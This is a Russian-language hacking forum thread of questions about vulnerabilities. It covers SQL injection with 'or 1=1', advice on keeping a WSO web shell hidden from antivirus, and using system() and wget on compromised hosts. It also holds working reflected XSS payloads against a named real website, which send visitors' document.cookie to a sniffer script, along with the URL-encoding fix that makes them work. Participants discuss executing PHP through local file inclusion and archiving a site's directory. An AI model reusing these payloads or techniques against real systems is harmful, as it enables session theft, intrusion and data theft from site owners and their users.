Ваши вопросы по уязвимостям.

там же написано SQL инъекция

 

там могли написать "конь в пальто".
а я спросил
как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?

 

Отвечаю, так может быть очень просто, это связано с инъекцией, пройдёт с сайтами на которых есть такая инъекция.

Нормально так? Линки на статьи по скулям пхп и html нужны?

 

jokester

)) нормально! а линки думаю сам найду. просто хотел узнать: что за такая инъекция ? ))) здесь если можно - немного подорбно.

 

Обыкновенная инекция :/
where username = '' or 1=1;
первое условие не срабатывает,поэтому србатывает второе,заранее верное условие, 1=1.Помоему как то так.

 

Какой прогой можно криптонуть шелл?
штобы и код срабатывал и антивирем непалился)

 

wso вполне нормальный и не палится

 

Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
Но может быть ограничение и в самом скрипте.

Функци system() работает как в unix, так и в windows, только там команды шелла разные.
wget есть и под windows.

 

Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )

 

че -то не очень верю в это ! в моем случае не работает. я спросил здесь, мне сказали, что хост блокирует. (wso)

 

http://www.google.com/search?q=windows+wget
http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget-1.10.2.exe

 

Ээ, ХП и Севен этой команды не знают, если wget не установлен. Если бы ты погуглил, ты бы увидел, что прога под вин есть, и даже есть GUI
А вот win32 сборка Льюиса

 

http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>

если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))

в чем проблема?

 

вот так работает редирект с куками
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--

короче нужно ? заменить на %3F

так же работает
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--

 

2AFoST спасибо


И такой еще вопрос, что дает возможность записи пхп кода в сессию???

 

прямая посылка изменяимых даннх (пхп кодэ) юзверя от которого ты дейсвуешь видимо

 

если есть локальный инклуд - даёт возможность инклудить код и испольнить его.

 

ок понял, жаль инклуда нету.

 

Как каталог в линукс заархивировать? (вместе с каталогами и файлами в нем)(с командами линукса не сталкивался)
Пробывал так:
tar -cz -f /var/www/site/www/file.tar.gz /var/www/site2/www/

Не пишет, т.е. архив создается но правильное заархивирование этой командой не получается

Подскажите вообщем

 

так необязательно архивировать через командную строку...
можно просто правой кнопкой мышы)